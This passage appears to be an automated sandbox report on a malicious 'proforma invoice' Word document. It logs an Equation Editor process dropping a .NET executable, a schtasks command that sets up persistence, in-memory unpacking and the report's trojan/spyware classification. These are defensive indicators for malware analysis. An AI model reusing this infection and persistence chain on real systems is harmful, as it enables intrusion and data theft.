Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002B39D9	4_2_002B39D9
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002B1C91	4_2_002B1C91
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002B55CA	4_2_002B55CA
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002B3787	4_2_002B3787
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002B3798	4_2_002B3798
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_000F77E7	7_2_000F77E7
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003B5330	7_2_003B5330
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003B6348	7_2_003B6348
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003BF760	7_2_003BF760
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003BCB10	7_2_003BCB10
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003B2087	7_2_003B2087
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003B5678	7_2_003B5678
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003BDAD0	7_2_003BDAD0
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003BAB68	7_2_003BAB68
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_0218A0CA	7_2_0218A0CA
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_021816C0	7_2_021816C0
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_0218B0F0	7_2_0218B0F0
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_021853D8	7_2_021853D8
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_02181C40	7_2_02181C40
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_0218B6E0	7_2_0218B6E0

Source: E6RVLMWo0fz1jFA[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gDgbkskgY.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: E6RVLMWo0fz1jFA[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: gDgbkskgY.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 7.2.powiuytrewasfdfghjkl.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.powiuytrewasfdfghjkl.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@8/15@11/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$OFORMA INVOICE-09765434.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Mutant created: \Sessions\1\BaseNamedObjects\dhYIzOQvKEIaKiumHzCQtcmRG

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCACD.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ................................h.......(.P.............8................u................................................................-.....

Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PROFORMA INVOICE-09765434.doc	Virustotal: Detection: 43%
Source: PROFORMA INVOICE-09765434.doc	ReversingLabs: Detection: 53%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gDgbkskgY' /XML 'C:\Users\user\AppData\Local\Temp\tmpE966.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gDgbkskgY' /XML 'C:\Users\user\AppData\Local\Temp\tmpE966.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process created: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: E6RVLMWo0fz1jFA[1].exe.2.dr, ITypeComp.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: gDgbkskgY.exe.4.dr, ITypeComp.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.powiuytrewasfdfghjkl.exe.f0000.0.unpack, ITypeComp.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.powiuytrewasfdfghjkl.exe.f0000.0.unpack, ITypeComp.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.powiuytrewasfdfghjkl.exe.f0000.0.unpack, ITypeComp.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.powiuytrewasfdfghjkl.exe.f0000.0.unpack, ITypeComp.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_000F561E push 00000000h; iretd	4_2_000F5668
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002B8BEE push ecx; ret	4_2_002B8BEF
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_000F561E push 00000000h; iretd	7_2_000F5668
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003B13A0 pushfd ; iretd	7_2_003B13E9
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 7_2_003B3869 pushfd ; iretd	7_2_003B386D

Source: initial sample	Static PE information: section name: .text entropy: 7.72275795726
Source: initial sample	Static PE information: section name: .text entropy: 7.72275795726

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	File created: C:\Users\user\AppData\Roaming\gDgbkskgY.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\E6RVLMWo0fz1jFA[1].exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gDgbkskgY' /XML 'C:\Users\user\AppData\Local\Temp\tmpE966.tmp'

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
